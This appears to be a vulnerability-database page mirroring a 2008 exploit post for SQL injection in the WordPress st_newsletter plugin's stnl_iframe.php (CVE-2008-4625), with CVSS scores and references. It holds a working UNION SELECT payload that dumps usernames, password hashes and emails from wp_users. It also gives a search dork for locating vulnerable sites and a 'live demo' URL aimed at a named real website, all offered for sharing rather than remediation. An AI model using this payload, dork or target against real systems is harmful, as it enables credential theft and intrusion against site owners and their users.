Wordpress Plugin st_newsletter (stnl_iframe.php) SQL Injection Vuln

2008-10-21 / 2008-10-22

Credit: r45c4l

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-4625

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz #
# and all darkc0de and DarkTrix members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com & darktrix.info
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
################################################################
#
# Title: WordPress stnl_iframe remote sql injection vulnerability
#
#
###########################################################
#
# d0rk: ''stnl_iframe''
#
###########################################################
POC :-
wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
Live Demo:
http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
###########################################################
#
# Bug discovered : 18 Oct 2008
###########################################################

References:

http://www.securityfocus.com/bid/31806

http://www.milw0rm.com/exploits/6777

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wordpress Plugin st_newsletter (stnl_iframe.php) SQL Injection Vuln

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.